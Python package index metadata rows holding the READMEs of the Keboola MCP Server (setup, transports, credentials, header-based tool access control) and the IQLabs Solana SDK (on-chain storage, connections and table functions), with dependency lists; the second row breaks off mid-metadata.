---
## 🚀 Quick Start: Remote MCP Server (Easiest Way)
<div class="alert alert-warning" role="alert">
<strong>⚠️ SSE Transport Decommissioning:</strong> The SSE transport is deprecated and will be removed from the Keboola MCP Server on 2026-Mar-31. Please migrate to the Streamable HTTP transport and use the <code>/mcp</code> endpoints instead of <code>/sse</code>.
</div>
The easiest way to use Keboola MCP Server is through our **Remote MCP Server**. This hosted solution eliminates the need for local setup, configuration, or installation.
### What is the Remote MCP Server?
Our remote server is hosted on every multi-tenant Keboola stack and supports OAuth authentication. You can connect to it from any AI assistant that supports remote Streamable HTTP connection and OAuth authentication.
### How to Connect
1. **Get your remote server URL**: Navigate to your Keboola Project Settings → `MCP Server` tab
2. **Copy the server URL**: It will look like `https://mcp.<YOUR_REGION>.keboola.com/mcp`
3. **Configure your AI assistant**: Paste the URL into your AI assistant's MCP settings
4. **Authenticate**: You'll be prompted to authenticate with your Keboola account and select your project
### Supported Clients
- **[Cursor](https://cursor.com)**: Use the "Install In Cursor" button in your project's MCP Server settings or click
this button
[](cursor://anysphere.cursor-deeplink/mcp/install?name=keboola&config=eyJ1cmwiOiJodHRwczovL21jcC51cy1lYXN0NC5nY3Aua2Vib29sYS5jb20vbWNwIn0%3D)
- **[Claude Desktop](https://claude.ai)**: Add the integration via Settings → Integrations
- **[Claude Code](https://www.anthropic.com/)**: Install using `claude mcp add --transport http keboola <URL>` (see below for details)
- **[Windsurf](https://windsurf.ai)**: Configure with the remote server URL
- **[Make](https://make.com)**: Configure with the remote server URL
- **Other MCP clients**: Configure with the remote server URL
#### Claude Code Setup
Claude Code is a command-line interface tool that allows you to interact with Claude using your terminal. You can install the Keboola MCP Server integration using a simple command.
**Installation:**
Run the following command in your terminal, replacing `<YOUR_REGION>` with your Keboola region:
```bash
claude mcp add --transport http keboola https://mcp.<YOUR_REGION>.keboola.com/mcp
```
**Region-specific commands:**
| Region | Installation Command |
|--------|----------------------|
| US Virginia AWS | `claude mcp add --transport http keboola https://mcp.keboola.com/mcp` |
| US Virginia GCP | `claude mcp add --transport http keboola https://mcp.us-east4.gcp.keboola.com/mcp` |
| EU Frankfurt AWS | `claude mcp add --transport http keboola https://mcp.eu-central-1.keboola.com/mcp` |
| EU Ireland Azure | `claude mcp add --transport http keboola https://mcp.north-europe.azure.keboola.com/mcp` |
| EU Frankfurt GCP | `claude mcp add --transport http keboola https://mcp.europe-west3.gcp.keboola.com/mcp` |
**Usage:**
Once installed, you can use the Keboola MCP Server in Claude Code by typing `/mcp` in your conversation and selecting the Keboola tools you want to use.
**Authentication:**
When you first use the Keboola MCP Server in Claude Code, a browser window will open prompting you to:
1. Log in with your Keboola account
2. Select the project you want to connect to
3. Authorize the connection
After authentication, you can start using Keboola tools directly from Claude Code.
For detailed setup instructions and region-specific URLs, see our [Remote Server Setup documentation](https://help.keboola.com/ai/mcp-server/#remote-server-setup).
### Using Development Branches
You can work safely in [Keboola development branches](https://help.keboola.com/components/branches/) without affecting your production data. The remotely hosted MCP Servers respect the `KBC_BRANCH_ID` parameter and will scope all operations to the specified branch. You can find the development branch ID in the URL when navigating to the development branch in the UI, for example: `https://connection.us-east4.gcp.keboola.com/admin/projects/PROJECT_ID/branch/BRANCH_ID/dashboard`. The branch ID must be included in each request using the header `X-Branch-Id: <branchId>`, otherwise the MCP Server uses production branch as default. This should be managed by the AI client or the environment handling the server connection.
### Tool Authorization and Access Control
When using HTTP-based transports (Streamable HTTP), you can control which tools are available to clients using HTTP headers. This is useful for restricting AI agent capabilities or enforcing compliance policies.
#### Authorization Headers
| Header | Description | Example |
|--------|-------------|---------|
| `X-Allowed-Tools` | Comma-separated list of allowed tools | `get_configs,get_buckets,query_data` |
| `X-Disallowed-Tools` | Comma-separated list of tools to exclude | `create_config,run_job` |
| `X-Read-Only-Mode` | Restrict to read-only tools only | `true`, `1`, or `yes` |
#### Filter Behavior
Filters apply in order: allowed → read-only intersection → disallowed exclusion. Empty headers = no restriction.
#### Read-Only Tools
Read-only tools are those annotated with `readOnlyHint=True`. These tools only retrieve information without making any changes to your Keboola project. For the current list of read-only tools, see the [TOOLS.md](TOOLS.md) file which is an auto-generated snapshot of the actual tool set.
#### Example: Read-Only Access
```
X-Read-Only-Mode: true
```
For detailed documentation, see [developers.keboola.com/integrate/mcp/#tool-authorization-and-access-control](https://developers.keboola.com/integrate/mcp/#tool-authorization-and-access-control).
---
## Local MCP Server Setup (Custom or Dev Way)
Run the MCP server on your own machine for full control and easy development. Choose this when you want to customize tools, debug locally, or iterate quickly. You’ll clone the repo, set Keboola credentials via environment variables or headers depending on the server transport, install dependencies, and start the server. This approach offers maximum flexibility (custom tools, local logging, offline iteration) but requires manual setup and you manage updates and secrets yourself.
The server supports multiple **transport** options, which can be selected by providing the `--transport <transport>` argument when starting the server:
- `stdio` - Default when `--transport` is not specified. Standard input/output, typically used for local deployment with a single client.
- `streamable-http` - Runs the server remotely over HTTP with a bidirectional streaming channel, allowing the client and server to continuously exchange messages. Connect via <url>/mcp (e.g., http://localhost:8000/mcp).
- `sse` - **Deprecated (will be removed on 2026-Mar-31)**, use `streamable-http` instead. Runs the server remotely using Server-Sent Events (SSE) for one-way event streaming from server to client. Connect via <url>/sse (e.g., http://localhost:8000/sse).
- `http-compat` - A custom transport supporting both `SSE` and `streamable-http`. It is currently used on Keboola remote servers but will be replaced by `streamable-http` only when SSE is removed.
For client–server communication, Keboola credentials must be provided to enable working with your project in your Keboola Region. The following are required: `KBC_STORAGE_TOKEN`, `KBC_STORAGE_API_URL`, `KBC_WORKSPACE_SCHEMA` and optionally `KBC_BRANCH_ID`. You can provide these in two ways:
- For personal use (mainly with stdio transport): set the environment variables before starting the server. All requests will reuse these predefined credentials.
- For multi-user use: include the variables in the request headers so that each request uses the credentials provided with it.
### KBC_STORAGE_TOKEN
This is your authentication token for Keboola:
For instructions on how to create and manage Storage API tokens, refer to the [official Keboola documentation](https://help.keboola.com/management/project/tokens/).
**Note**: If you want the MCP server to have limited access, use a custom storage token; if you want it to access everything in your project, use the master token.
### KBC_WORKSPACE_SCHEMA
This identifies your workspace in Keboola and is used for SQL queries. However, this is **only required if you're using a custom storage token** instead of the Master Token:
- If using [Master Token](https://help.keboola.com/management/project/tokens/#master-tokens): The workspace is created automatically behind the scenes
- If using [custom storage token](https://help.keboola.com/management/project/tokens/#limited-tokens): Follow this [Keboola guide](https://help.keboola.com/tutorial/manipulate/workspace/) to get your KBC_WORKSPACE_SCHEMA
**Note**: When creating a workspace manually, check the *Grant read-only access to all Project data* option.
**Note**: In BigQuery workspaces, `KBC_WORKSPACE_SCHEMA` is called *Dataset Name*; simply click Connect and copy the Dataset Name.
### KBC_STORAGE_API_URL (Keboola Region)
Your Keboola Region API URL depends on your deployment region. You can determine your region by looking at the URL in your browser when logged into your Keboola project:
| Region | API URL |
|--------|---------|
| AWS North America | `https://connection.keboola.com` |
| AWS Europe | `https://connection.eu-central-1.keboola.com` |
| Google Cloud EU | `https://connection.europe-west3.gcp.keboola.com` |
| Google Cloud US | `https://connection.us-east4.gcp.keboola.com` |
| Azure EU | `https://connection.north-europe.azure.keboola.com` |
### KBC_BRANCH_ID (Optional)
To operate on a specific [Keboola development branch](https://help.keboola.com/components/branches/), set the branch ID using the `KBC_BRANCH_ID` parameter. The MCP server scopes its functionality to the specified branch, ensuring all changes remain isolated and do not impact the production branch.
- If not provided, the server uses the production branch by default.
- For development work, set `KBC_BRANCH_ID` to the numeric ID of your branch (e.g., `123456`). You can find the development branch ID in the URL when navigating to the development branch in the UI, for example: `https://connection.us-east4.gcp.keboola.com/admin/projects/PROJECT_ID/branch/BRANCH_ID/dashboard`.
- On remote transports, you can override per-request with the HTTP header `X-Branch-Id: <branchId>` or `KBC_BRANCH_ID: <branchId>`.
### Installation
Make sure you have:
- [ ] Python 3.10+ installed
- [ ] Access to a Keboola project with admin rights
- [ ] Your preferred MCP client (Claude, Cursor, etc.)
**Note**: Make sure you have `uv` installed. The MCP client will use it to automatically download and run the Keboola MCP Server.
**Installing uv**:
*macOS/Linux*:
```bash
# If Homebrew is not installed on your machine, first run:
# /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install using Homebrew
brew install uv
```
*Windows*:
```powershell
# Using the installer script
powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"
# Or using pip
pip install uv
# Or using winget
winget install --id=astral-sh.uv -e
```
For more installation options, see the [official uv documentation](https://docs.astral.sh/uv/getting-started/installation/).
### Running Keboola MCP Server
There are four ways to use the Keboola MCP Server, depending on your needs:
### Option A: Integrated Mode (Recommended)
In this mode, Claude or Cursor automatically starts the MCP server for you. **You do not need to run any commands in your terminal**.
1. Configure your MCP client (Claude/Cursor) with the appropriate settings
2. The client will automatically launch the MCP server when needed
#### Claude Desktop Configuration
1. Go to Claude (top left corner of your screen) → Settings → Developer → Edit Config (if you don't see the `claude_desktop_config.json`, create it)
2. Add the following configuration:
3. Restart Claude desktop for changes to take effect
```json
{
"mcpServers": {
"keboola": {
"command": "uvx",
"args": ["keboola_mcp_server", "--transport", "<transport>"],
"env": {
"KBC_STORAGE_API_URL": "https://connection.YOUR_REGION.keboola.com",
"KBC_STORAGE_TOKEN": "your_keboola_storage_token",
"KBC_WORKSPACE_SCHEMA": "your_workspace_schema",
"KBC_BRANCH_ID": "your_branch_id_optional"
}
}
}
}
```
Config file locations:
- **macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
- **Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
#### Cursor Configuration
1. Go to Settings → MCP
2. Click "+ Add new global MCP Server"
3. Configure with these settings:
```json
{
"mcpServers": {
"keboola": {
"command": "uvx",
"args": ["keboola_mcp_server", "--transport", "<transport>"],
"env": {
"KBC_STORAGE_API_URL": "https://connection.YOUR_REGION.keboola.com",
"KBC_STORAGE_TOKEN": "your_keboola_storage_token",
"KBC_WORKSPACE_SCHEMA": "your_workspace_schema",
"KBC_BRANCH_ID": "your_branch_id_optional"
}
}
}
}
```
**Note**: Use short, descriptive names for MCP servers. The full tool name includes the server name and must stay under ~60 characters, so longer server names may cause tools to be filtered out in Cursor and not displayed to the Agent.
#### Cursor Configuration for Windows WSL
When running the MCP server from Windows Subsystem for Linux with Cursor AI, use this configuration:
```json
{
"mcpServers": {
"keboola":{
"command": "wsl.exe",
"args": [
"bash",
"-c '",
"export KBC_STORAGE_API_URL=https://connection.YOUR_REGION.keboola.com &&",
"export KBC_STORAGE_TOKEN=your_keboola_storage_token &&",
"export KBC_WORKSPACE_SCHEMA=your_workspace_schema &&",
"export KBC_BRANCH_ID=your_branch_id_optional &&",
"/snap/bin/uvx keboola_mcp_server --transport <transport>",
"'"
]
}
}
}
```
### Option B: Local Development Mode
For developers working on the MCP server code itself:
1. Clone the repository and set up a local environment
2. Configure Claude/Cursor to use your local Python path:
```json
{
"mcpServers": {
"keboola": {
"command": "/absolute/path/to/.venv/bin/python",
"args": [
"-m",
"keboola_mcp_server",
"--transport",
"<transport>"
],
"env": {
"KBC_STORAGE_API_URL": "https://connection.YOUR_REGION.keboola.com",
"KBC_STORAGE_TOKEN": "your_keboola_storage_token",
"KBC_WORKSPACE_SCHEMA": "your_workspace_schema",
"KBC_BRANCH_ID": "your_branch_id_optional"
}
}
}
}
```
### Option C: Manual CLI Mode (For Testing Only)
You can run the server manually in a terminal for testing or debugging:
```bash
# Set environment variables
export KBC_STORAGE_API_URL=https://connection.YOUR_REGION.keboola.com
export KBC_STORAGE_TOKEN=your_keboola_storage_token
export KBC_WORKSPACE_SCHEMA=your_workspace_schema
export KBC_BRANCH_ID=your_branch_id_optional
uvx keboola_mcp_server --transport streamable-http
```
> **Note**: This mode is primarily for debugging or testing. For normal use with Claude or Cursor,
> you do not need to manually run the server.
> **Note**: The server will use the Streamable HTTP transport and listen on `localhost:8000` for incoming connections at `/mcp`.
> You can use `--port` and `--host` parameters to make it listen elsewhere.
### Option D: Using Docker
```shell
docker pull keboola/mcp-server:latest
docker run \
--name keboola_mcp_server \
--rm \
-it \
-p 127.0.0.1:8000:8000 \
-e KBC_STORAGE_API_URL="https://connection.YOUR_REGION.keboola.com" \
-e KBC_STORAGE_TOKEN="YOUR_KEBOOLA_STORAGE_TOKEN" \
-e KBC_WORKSPACE_SCHEMA="YOUR_WORKSPACE_SCHEMA" \
-e KBC_BRANCH_ID="YOUR_BRANCH_ID_OPTIONAL" \
keboola/mcp-server:latest \
--transport streamable-http \
--host 0.0.0.0
```
> **Note**: The server will use the Streamable HTTP transport and listen on `localhost:8000` for incoming connections at `/mcp`.
> You can change `-p` to map the container's port somewhere else.
### Do I Need to Start the Server Myself?
| Scenario | Need to Run Manually? | Use This Setup |
|----------|----------------------|----------------|
| Using Claude/Cursor | No | Configure MCP in app settings |
| Developing MCP locally | No (Claude starts it) | Point config to python path |
| Testing CLI manually | Yes | Use terminal to run |
| Using Docker | Yes | Run docker container |
## Using MCP Server
Once your MCP client (Claude/Cursor) is configured and running, you can start querying your Keboola data:
### Verify Your Setup
You can start with a simple query to confirm everything is working:
```text
What buckets and tables are in my Keboola project?
```
### Examples of What You Can Do
**Data Exploration:**
- "What tables contain customer information?"
- "Run a query to find the top 10 customers by revenue"
**Data Analysis:**
- "Analyze my sales data by region for the last quarter"
- "Find correlations between customer age and purchase frequency"
**Data Pipelines:**
- "Create a SQL transformation that joins customer and order tables"
- "Start the data extraction job for my Salesforce component"
## Compatibility
### MCP Client Support
| **MCP Client** | **Support Status** | **Connection Method** |
|----------------|-------------------|----------------------|
| Claude (Desktop & Web) | ✅ Supported | stdio |
| Cursor | ✅ Supported | stdio |
| Windsurf, Zed, Replit | ✅ Supported | stdio |
| Codeium, Sourcegraph | ✅ Supported | HTTP+SSE |
| Custom MCP Clients | ✅ Supported | HTTP+SSE or stdio |
## Supported Tools
**Note:** Your AI agents will automatically adjust to new tools.
For a complete list of available tools with detailed descriptions, parameters, and usage examples, see [TOOLS.md](TOOLS.md).
## Troubleshooting
### Common Issues
| Issue | Solution |
|-------|----------|
| **Authentication Errors** | Verify `KBC_STORAGE_TOKEN` is valid |
| **Workspace Issues** | Confirm `KBC_WORKSPACE_SCHEMA` is correct |
| **Connection Timeout** | Check network connectivity |
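For authentication errors, a quick sanity check is to call the Storage API token verification endpoint directly. This is a sketch: it uses the standard Keboola Storage API endpoint `/v2/storage/tokens/verify`, but the helper name here is ours, not part of the MCP server.

```python
# Sketch: build a request against the Keboola Storage API token verification
# endpoint (/v2/storage/tokens/verify); an HTTP 200 response means the token is valid.
import os
import urllib.request


def build_verify_request(api_url: str, token: str) -> urllib.request.Request:
    """Builds a GET request that verifies a Storage API token."""
    return urllib.request.Request(
        api_url.rstrip('/') + '/v2/storage/tokens/verify',
        headers={'X-StorageApi-Token': token},
    )


req = build_verify_request(
    os.environ.get('KBC_STORAGE_API_URL', 'https://connection.keboola.com'),
    os.environ.get('KBC_STORAGE_TOKEN', ''))
print(req.full_url)
# urllib.request.urlopen(req)  # uncomment to actually send the request
```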
## Development
### Installation
Basic setup:
```bash
uv sync --extra dev
```
With the basic setup, you can use `uv run tox` to run tests and check code style.
Recommended setup:
```bash
uv sync --extra dev --extra tests --extra integtests --extra codestyle
```
With the recommended setup, packages for testing and code style checking are installed, which allows IDEs like
VS Code or Cursor to check the code or run tests during development.
### Integration tests
To run integration tests locally, use `uv run tox -e integtests`.
NOTE: You will need to set the following environment variables:
- `INTEGTEST_STORAGE_API_URL`
- `INTEGTEST_STORAGE_TOKEN`
- `INTEGTEST_WORKSPACE_SCHEMA`
In order to get these values, you need a dedicated Keboola project for integration tests.
### Updating `uv.lock`
Update the `uv.lock` file if you have added or removed dependencies. Also consider updating the lock with newer dependency
versions when creating a release (`uv lock --upgrade`).
### Updating Tool Documentation
When you make changes to any tool descriptions (docstrings in tool functions), you must regenerate the `TOOLS.md` documentation file to reflect these changes:
```bash
uv run python -m src.keboola_mcp_server.generate_tool_docs
```
## Support and Feedback
**⭐ The primary way to get help, report bugs, or request features is by [opening an issue on GitHub](https://github.com/keboola/mcp-server/issues/new). ⭐**
The development team actively monitors issues and will respond as quickly as possible. For general information about Keboola, please use the resources below.
## Resources
- [User Documentation](https://help.keboola.com/)
- [Developer Documentation](https://developers.keboola.com/)
- [Keboola Platform](https://www.keboola.com)
- [Issue Tracker](https://github.com/keboola/mcp-server/issues/new) ← **Primary contact method for MCP Server**
## Connect
- [LinkedIn](https://www.linkedin.com/company/keboola)
- [Twitter](https://x.com/keboola)
- [Changelog](https://changelog.keboola.com/)
[//]: # (mcp-name: com.keboola/mcp -- keep this line for registry.modelcontextprotocol.io)
| text/markdown | null | Keboola <devel@keboola.com> | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"cryptography~=46.0",
"fastmcp==2.14.1",
"httpx-retries~=0.4",
"httpx~=0.28",
"json-log-formatter~=1.1",
"jsonpath-ng~=1.7",
"jsonschema~=4.25",
"mcp==1.24.0",
"pydantic~=2.12",
"pyjwt~=2.10",
"pyyaml~=6.0",
"sqlglot~=28.5",
"toon-format~=0.9.0b1",
"black~=25.11; extra == \"codestyle\"",
"flake8-bugbear~=25.11; extra == \"codestyle\"",
"flake8-colors~=0.1; extra == \"codestyle\"",
"flake8-isort~=7.0; extra == \"codestyle\"",
"flake8-pyproject~=1.2; extra == \"codestyle\"",
"flake8-pytest-style~=2.2; extra == \"codestyle\"",
"flake8-quotes~=3.4; extra == \"codestyle\"",
"flake8-typing-imports~=1.17; extra == \"codestyle\"",
"flake8~=7.3; extra == \"codestyle\"",
"isort~=7.0; extra == \"codestyle\"",
"pep8-naming~=0.15; extra == \"codestyle\"",
"tox~=4.32; extra == \"dev\"",
"kbcstorage~=0.9; extra == \"integtests\"",
"pytest-asyncio~=1.3; extra == \"tests\"",
"pytest-cov~=7.0; extra == \"tests\"",
"pytest-datadir~=1.8; extra == \"tests\"",
"pytest-mock~=3.15; extra == \"tests\"",
"pytest~=9.0; extra == \"tests\"",
"python-dateutil~=2.9; extra == \"tests\"",
"python-dotenv~=1.2; extra == \"tests\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.9.25 | 2026-02-20T09:28:38.396055 | keboola_mcp_server-1.44.7-py3-none-any.whl | 199,288 | d6/68/57a151bb53abaa6e0fe1a53e8d0a102192f5a106790cc8e2600eac18f98b/keboola_mcp_server-1.44.7-py3-none-any.whl | py3 | bdist_wheel | null | false | 3157819f9efb31e1d07299502ef3a5eb | 19c55311f3ff2e5c325259bb981f12854180ada5cb4621080e360c5abbd16546 | d66857a151bb53abaa6e0fe1a53e8d0a102192f5a106790cc8e2600eac18f98b | MIT | [
"LICENSE"
] | 169 |
2.4 | iqlabs-solana-sdk | 0.1.5 | IQLabs Solana SDK for Python — on-chain data storage, database tables, and connections | # IQLabs SDK (Python)
> **Draft**: This document is in progress and will be refined.
---
## Table of Contents
1. [Core Concepts](#core-concepts)
- [Data Storage (Code In)](#data-storage-code-in)
- [User State PDA](#user-state-pda)
- [Connection PDA](#connection-pda)
- [Database Tables](#database-tables)
2. [Function Details](#function-details)
- [Data Storage and Retrieval](#data-storage-and-retrieval)
- [Connection Management](#connection-management)
- [Table Management](#table-management)
- [Environment Settings](#environment-settings)
2.1. [Advanced Functions](#advanced-functions) (list only)
---
## Core Concepts
These are the key concepts to know before using the IQLabs SDK.
---
### Data Storage (Code In)
This is how you store any data (files, text, JSON) on-chain.
#### How is it stored?
Depending on data size, the SDK picks the optimal method:
- **Small data (< 700 bytes)**: store immediately, fastest
- **Medium data (< 8.5 KB)**: split into multiple transactions
- **Large data (>= 8.5 KB)**: upload in parallel for speed
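The tier selection can be sketched as follows (thresholds taken from the list above; the strategy names are illustrative, not actual SDK identifiers):

```python
# Illustrative sketch of the size-based upload strategy described above.
# Thresholds come from the list; the returned names are made up for clarity.
def pick_upload_strategy(data: bytes) -> str:
    size = len(data)
    if size < 700:            # small: stored immediately in one transaction
        return 'single-tx'
    if size < 8.5 * 1024:     # medium: split into multiple transactions
        return 'multi-tx'
    return 'parallel-upload'  # large: uploaded in parallel for speed


print(pick_upload_strategy(b'x' * 100))    # → single-tx
print(pick_upload_strategy(b'x' * 4096))   # → multi-tx
print(pick_upload_strategy(b'x' * 20000))  # → parallel-upload
```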
#### Key related functions
- [`code_in()`](#code_in): upload data and get a transaction ID
- [`read_code_in()`](#read_code_in): read data back from a transaction ID
---
### User State PDA
An on-chain profile account for a user.
#### What gets stored?
- Profile info (name, profile picture, bio, etc.)
- Number of uploaded files
- Friend request records
> **Note**: Friend requests are not stored as values in the PDA; they are sent as transactions.
#### When is it created?
It is created automatically the first time you call [`code_in()`](#code_in). No extra setup is required, but the first user may need to sign twice.
---
### Connection PDA
An on-chain account that manages relationships between two users (friends, messages, etc.).
#### What states can it have?
- **pending**: a friend request was sent but not accepted yet
- **approved**: the request was accepted and the users are connected
- **blocked**: one side blocked the other
> **Important**: A blocked connection can only be unblocked by the blocker.
#### Key related functions
- [`request_connection()`](#request_connection): send a friend request (creates pending)
- [`manage_connection()`](#manage_connection): approve/reject/block/unblock a request
- [`read_connection()`](#read_connection): check current relationship status
- [`write_connection_row()`](#write_connection_row): exchange messages/data with a connected friend
- [`fetch_user_connections()`](#fetch_user_connections): fetch all connections (sent & received friend requests)
---
### Database Tables
Store JSON data in tables like a database.
#### How are tables created?
There is no dedicated "create table" function. The first write via [`write_row()`](#write_row) creates the table automatically.
> **Note**: A table is uniquely identified by the combination of `db_root_id` and `table_seed` (table name).
#### Key related functions
- [`write_row()`](#write_row): add a new row (creates the table if missing)
- [`read_table_rows()`](#read_table_rows): read rows from a table
- [`get_tablelist_from_root()`](#get_tablelist_from_root): list all tables in a database
- [`fetch_inventory_transactions()`](#fetch_inventory_transactions): list uploaded files
---
## Function Details
### Data Storage and Retrieval
#### `code_in()`
| **Parameters** | `connection`: Solana RPC AsyncClient<br>`signer`: Keypair or WalletSigner<br>`chunks`: data to upload (list[str])<br>`filename`: optional filename (str or None)<br>`method`: upload method (int, default: 0)<br>`filetype`: file type hint (str, default: '')<br>`on_progress`: optional progress callback (Callable[[int], None]) |
|----------|--------------------------|
| **Returns** | Transaction signature (str) |
**Example:**
```python
from iqlabs import writer
from solana.rpc.async_api import AsyncClient
from solders.keypair import Keypair
# Upload data
signature = await writer.code_in(connection, signer, ['Hello, blockchain!'])
# Upload with filename
signature = await writer.code_in(connection, signer, ['file contents here'], filename='hello.txt')
```
---
#### `read_code_in()`
| **Parameters** | `tx_signature`: transaction signature (str)<br>`speed`: rate limit profile (optional, str)<br>`on_progress`: optional progress callback (Callable[[int], None]) |
|----------|--------------------------|
| **Returns** | dict with `metadata` (str) and `data` (str or None) |
**Example:**
```python
from iqlabs import reader
result = await reader.read_code_in('5Xg7...')
print(result['data']) # 'Hello, blockchain!'
print(result['metadata']) # JSON string with file metadata
```
---
### Connection Management
#### `request_connection()`
| **Parameters** | `connection`: AsyncClient<br>`signer`: Keypair<br>`db_root_id`: database ID (bytes or str)<br>`party_a`: first user pubkey (str)<br>`party_b`: second user pubkey (str)<br>`table_name`: connection table name (str or bytes)<br>`columns`: column list (list[str or bytes])<br>`id_col`: ID column (str or bytes)<br>`ext_keys`: extension keys (list[str or bytes]) |
|----------|--------------------------|
| **Returns** | Transaction signature (str) |
**Example:**
```python
from iqlabs import writer
await writer.request_connection(
connection, signer, 'my-db',
my_wallet_address, friend_wallet_address,
'dm_table', ['message', 'timestamp'], 'message_id', []
)
```
---
#### `manage_connection()`
> **Note**: There is no high-level SDK wrapper for this function. Use the contract-level instruction builder directly.
| **Parameters** | `builder`: InstructionBuilder<br>`accounts`: dict with `db_root`, `connection_table`, `signer`<br>`args`: dict with `db_root_id`, `connection_seed`, `new_status` |
|----------|--------------------------|
| **Returns** | Instruction |
**Example:**
```python
from iqlabs import contract
# Create an instruction builder
builder = contract.create_instruction_builder(contract.PROGRAM_ID)
# Approve a friend request
approve_ix = contract.manage_connection_instruction(
builder,
{"db_root": db_root, "connection_table": connection_table, "signer": my_pubkey},
{"db_root_id": db_root_id, "connection_seed": connection_seed, "new_status": contract.CONNECTION_STATUS_APPROVED}
)
# Block a user
block_ix = contract.manage_connection_instruction(
builder,
{"db_root": db_root, "connection_table": connection_table, "signer": my_pubkey},
{"db_root_id": db_root_id, "connection_seed": connection_seed, "new_status": contract.CONNECTION_STATUS_BLOCKED}
)
```
---
#### `read_connection()`
| **Parameters** | `db_root_id`: database ID (bytes or str)<br>`party_a`: first wallet (str)<br>`party_b`: second wallet (str) |
|----------|--------------------------|
| **Returns** | dict with `status`, `requester`, `blocker` |
**Example:**
```python
from iqlabs import reader
conn_info = await reader.read_connection('my-db', party_a, party_b)
print(conn_info['status']) # 'pending' | 'approved' | 'blocked'
```
---
#### `write_connection_row()`
| **Parameters** | `connection`: AsyncClient<br>`signer`: Keypair<br>`db_root_id`: database ID (bytes or str)<br>`connection_seed`: connection seed (bytes or str)<br>`row_json`: JSON data (str) |
|----------|--------------------------|
| **Returns** | Transaction signature (str) |
**Example:**
```python
from iqlabs import writer
import json
await writer.write_connection_row(
connection, signer, 'my-db', connection_seed,
json.dumps({"message_id": "123", "message": "Hello friend!", "timestamp": 1234567890})
)
```
---
#### `fetch_user_connections()`
Fetch all connections (friend requests) for a user by analyzing their UserState PDA transaction history. Each connection includes its `db_root_id`, identifying which app the connection belongs to.
| **Parameters** | `user_pubkey`: user public key (str or Pubkey)<br>`limit`: max number of transactions to fetch (optional)<br>`before`: signature to paginate from (optional)<br>`speed`: rate limit profile (optional) |
|----------|--------------------------|
| **Returns** | List of connection dicts with db_root_id, connection_pda, party_a, party_b, status, requester, blocker, timestamp |
**Example:**
```python
from iqlabs import reader
connections = await reader.fetch_user_connections(
my_pubkey,
speed="light",
limit=100
)
# Filter by status
pending_requests = [c for c in connections if c['status'] == 'pending']
friends = [c for c in connections if c['status'] == 'approved']
blocked = [c for c in connections if c['status'] == 'blocked']
# Check connection details
for conn in connections:
print(f"Party A: {conn['party_a']} <-> Party B: {conn['party_b']}, status: {conn['status']}")
```
---
### Table Management
#### `write_row()`
| **Parameters** | `connection`: AsyncClient<br>`signer`: Keypair<br>`db_root_id`: database ID (bytes or str)<br>`table_seed`: table name (bytes or str)<br>`row_json`: JSON row data (str)<br>`skip_confirmation`: skip tx confirmation (default: False) |
|----------|--------------------------|
| **Returns** | Transaction signature (str) |
**Example:**
```python
from iqlabs import writer
import json
# Write the first row to create the table
await writer.write_row(connection, signer, 'my-db', 'users', json.dumps({
"id": 1, "name": "Alice", "email": "alice@example.com"
}))
# Add another row to the same table
await writer.write_row(connection, signer, 'my-db', 'users', json.dumps({
"id": 2, "name": "Bob", "email": "bob@example.com"
}))
```
---
#### `read_table_rows()`
| **Parameters** | `account`: table PDA (Pubkey or str)<br>`before`: signature cursor for pagination (optional)<br>`limit`: max number of rows to fetch (optional)<br>`speed`: rate limit profile (optional) |
|----------|--------------------------|
| **Returns** | `list[dict]` |
**Example:**
```python
from iqlabs import reader
# Basic usage
rows = await reader.read_table_rows(table_pda, limit=50)
# Cursor-based pagination
older_rows = await reader.read_table_rows(table_pda, limit=50, before="sig...")
```
---
#### `get_tablelist_from_root()`
| **Parameters** | `connection`: AsyncClient<br>`db_root_id`: database ID (bytes or str) |
|----------|--------------------------|
| **Returns** | dict with `root_pda`, `creator`, `table_seeds`, `global_table_seeds` |
**Example:**
```python
from iqlabs import reader
result = await reader.get_tablelist_from_root(connection, 'my-db')
print('Creator:', result['creator'])
print('Table seeds:', result['table_seeds'])
```
---
#### `fetch_inventory_transactions()`
| **Parameters** | `public_key`: user public key (Pubkey)<br>`limit`: max count (int)<br>`before`: pagination cursor (optional, str) |
|----------|--------------------------|
| **Returns** | Transaction list |
**Example:**
```python
from iqlabs import reader
import json
my_files = await reader.fetch_inventory_transactions(my_pubkey, 20)
for tx in my_files:
    try:
        metadata = json.loads(tx['metadata'])
    except (json.JSONDecodeError, TypeError, KeyError):
        metadata = None
if metadata and 'data' in metadata:
inline_data = metadata['data'] if isinstance(metadata['data'], str) else json.dumps(metadata['data'])
print(f"Inline data: {inline_data}")
else:
print(f"Signature: {tx['signature']}")
```
---
### Environment Settings
#### `set_rpc_url()`
| **Parameters** | `url`: Solana RPC URL (str) |
|----------|--------------------------|
| **Returns** | None |
**Example:**
```python
from iqlabs import set_rpc_url
set_rpc_url('https://your-rpc.example.com')
```
---
## Advanced Functions
These functions are advanced/internal, so this doc only lists them. For details, please see our [developer docs](https://iqlabs.dev).
- `manage_row_data()` (`writer`)
- `read_user_state()` (`reader`)
- `read_inventory_metadata()` (`reader`)
- `get_session_pda_list()` (`reader`)
- `derive_dm_seed()` (`utils`)
- `to_seed_bytes()` (`utils`)
---
## Additional Resources
- [IQLabs Official X](https://x.com/IQLabsOfficial)
- [IQLabs Official Website](https://iqlabs.dev)
| text/markdown | null | IQLabs <dev@iqlabs.io> | null | null | null | solana, blockchain, sdk, iqlabs, on-chain, inscription | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Software Development :: Libraries"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"solana>=0.32.0",
"solders>=0.21.0",
"anchorpy>=0.19.0",
"pycryptodome>=3.20.0",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-asyncio>=0.21.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/IQCoreTeam/iqlabs-solana-sdk-python",
"Repository, https://github.com/IQCoreTeam/iqlabs-solana-sdk-python"
